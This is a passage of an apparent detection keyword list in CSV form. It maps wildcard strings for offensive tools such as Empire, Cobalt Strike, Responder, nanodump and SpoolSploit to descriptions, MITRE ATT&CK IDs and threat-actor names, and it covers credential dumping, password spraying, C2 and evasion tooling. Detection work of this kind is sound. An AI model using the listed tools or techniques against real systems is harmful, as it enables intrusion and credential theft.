tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*spiderfoot-cli -s http*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*-SpiderFoot-correlations.csv*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*spiderfoot-master*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*SpiderLabs/DoHC2*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*SpiderLabs/Responder*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*spindrift.py *--target *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*spindrift.py --domain*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*SplashtopStreamer3500.exe* prevercheck *,greyware_tool_keyword,Splashtop,control remote machines- abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*sploitus.com/exploit?id=6C1081C5-7938-5E83-9079-719C1B071FB5*,offensive_tool_keyword,POC,Automated PoC exploitation of CVE-2021-44521,T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/QHpix/CVE-2021-44521,1,1,N/A,N/A,1,9,2,2022-02-24T12:04:40Z,2022-02-24T11:07:34Z -*splunk/upload_app_exec/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*splunk_whisperer.py*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*splunk_whisperer-master*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*SplunkWhisperer2-master*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*-spn * -clsid * -shadowcred*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,0,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*spnroast_*.txt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*spoof_wani*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*spoof_wlan_creds*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*--spoof-callstack *,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*SpooferHostsIgnore*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferHostsReply*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferIP*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferIPsIgnore*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferIPsReply*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferLearningDelay*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferLearningInterval*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferRepeat*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*Spoofy/spoofy.py*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*SpookFlare*,offensive_tool_keyword,SpookFlare,SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side 
detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter. Empire. Koadic etc. SpookFlare has obfuscation. encoding. run-time code compilation and character substitution features.,T1027 - T1029 - T1218 - T1112,TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hlldz/SpookFlare,1,0,N/A,N/A,10,925,201,2019-05-08T09:03:45Z,2017-11-13T17:22:12Z -*spookflare.py*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*spool_sploit.py*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*spooler_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*SpoolSample.exe * *,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*SpoolSample_v4.5_x64.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking 
environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SpoolSploit/*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*spoolsploit:latest*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*spoolss_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 
- TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*spoolsystem inject*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*spoolsystem spawn*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*spoolsystem.cna*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 